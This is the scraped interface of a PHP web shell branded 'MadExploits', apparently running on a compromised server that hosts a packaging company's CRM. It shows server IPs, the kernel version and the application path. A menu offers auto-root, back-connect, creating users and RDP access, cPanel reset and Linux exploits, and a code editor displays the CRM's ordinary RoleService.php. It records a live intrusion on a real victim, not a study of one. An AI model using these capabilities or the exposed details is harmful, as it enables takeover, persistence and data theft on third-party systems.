Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.74
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
app /
Services /
[ HOME SHELL ]
Name
Size
Permission
Action
Admin
[ DIR ]
drwxr-xr-x
Front
[ DIR ]
drwxr-xr-x
AccessoryService.php
2.65
KB
-rw-r--r--
ActivityService.php
2.61
KB
-rw-r--r--
AdministrationService.php
2.7
KB
-rw-r--r--
AgentRawDataService.php
2.67
KB
-rw-r--r--
AttandanceService.php
2.64
KB
-rw-r--r--
AttendanceService.php
2.64
KB
-rw-r--r--
ClientService.php
2.58
KB
-rw-r--r--
CourierService.php
2.59
KB
-rw-r--r--
DealProductPrintingService.php
2.78
KB
-rw-r--r--
DealProductQuantityAndEstimati...
3.07
KB
-rw-r--r--
DealProductService.php
714
B
-rw-r--r--
DealService.php
3.56
KB
-rw-r--r--
DepartmentService.php
2.64
KB
-rw-r--r--
DesignationService.php
2.65
KB
-rw-r--r--
DomainService.php
2.59
KB
-rw-r--r--
EmailPhoneDetailService.php
3.4
KB
-rw-r--r--
EmbossingService.php
2.62
KB
-rw-r--r--
EmployeeService.php
2.62
KB
-rw-r--r--
FileService.php
4.21
KB
-rw-r--r--
FoilingService.php
2.59
KB
-rw-r--r--
JobtitleService.php
2.61
KB
-rw-r--r--
LaminationService.php
2.64
KB
-rw-r--r--
LeadSourceService.php
2.64
KB
-rw-r--r--
MaterialService.php
2.61
KB
-rw-r--r--
MetrialService.php
2.59
KB
-rw-r--r--
ModuleService.php
2.57
KB
-rw-r--r--
NoteService.php
2.54
KB
-rw-r--r--
PermissionService.php
2.64
KB
-rw-r--r--
PipelineService.php
2.61
KB
-rw-r--r--
PipelineStageService.php
3.17
KB
-rw-r--r--
ProductColorService.php
2.67
KB
-rw-r--r--
ProductMeasurementUnitService....
2.82
KB
-rw-r--r--
ProductPrintingService.php
2.71
KB
-rw-r--r--
ProductService.php
2.59
KB
-rw-r--r--
ProductStockService.php
2.67
KB
-rw-r--r--
ProjectService.php
2.6
KB
-rw-r--r--
RewardsService.php
2.58
KB
-rw-r--r--
RoleService.php
2.54
KB
-rw-r--r--
SettingService.php
2.59
KB
-rw-r--r--
ShiftTimeService.php
2.64
KB
-rw-r--r--
ShippingBoxService.php
2.68
KB
-rw-r--r--
StateService.php
2.56
KB
-rw-r--r--
UserService.php
2.54
KB
-rw-r--r--
UsersDaysoffService.php
2.67
KB
-rw-r--r--
UvService.php
2.51
KB
-rw-r--r--
VendorService.php
2.59
KB
-rw-r--r--
ZKTecoService.php
1.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RoleService.php
<?php /** * Created by crm_entity command. * @author : Muhammad Saeed * @todo : Service todo * @since : 2021Sep21 * @description : Service description */ namespace App\Services; use App\Repositories\RoleRepository; class RoleService { /** * @var RoleRepository */ protected $repository; /** * @var $calling_app */ protected $calling_app; /** * RoleRepository constructor. * * @param RoleRepository $repository */ public function __construct(RoleRepository $repository , $calling_app = '') { $this->repository = $repository; $this->calling_app = ucfirst($calling_app); } /** * RoleRepository constructor. * * @todo Function todo * @description Function description * @since 2021Sep21 * @param RoleRepository $repository */ public function index($request){ $this->repository->setPresenter("App\\Presenters\\".$this->calling_app."\\Role\\ListPresenter"); $this->repository->pushCriteria(app('Prettus\Repository\Criteria\RequestCriteria')); if ($request->has('paginate') && $request->paginate) { return $this->repository->paginate(); } return $this->repository->all(); } /** * RoleRepository constructor. * * @todo Function todo * @description Function description * @since 2021Sep21 * @param RoleCreateRequest $request */ public function create($request) { return $this->repository->create($request); } /** * RoleRepository constructor. * * @todo Function todo * @description Function description * @since 2021Sep21 * @param int $id */ public function find($id) { $this->repository->setPresenter("App\\Presenters\\".$this->calling_app."\\Role\\DetailPresenter"); $this->repository->pushCriteria(app('Prettus\Repository\Criteria\RequestCriteria')); return $this->repository->find($id); } /** * RoleRepository constructor. * * @todo Function todo * @description Function description * @since 2021Sep21 * @param RoleUpdateRequest $request * @param int $id */ public function update($request,$id) { return $this->repository->update($request,$id); } /** * RoleRepository constructor. * * @todo Function todo * @description Function description * @since 2021Sep21 * @param int $id */ public function delete($id) { return $this->repository->delete($id); } }
Close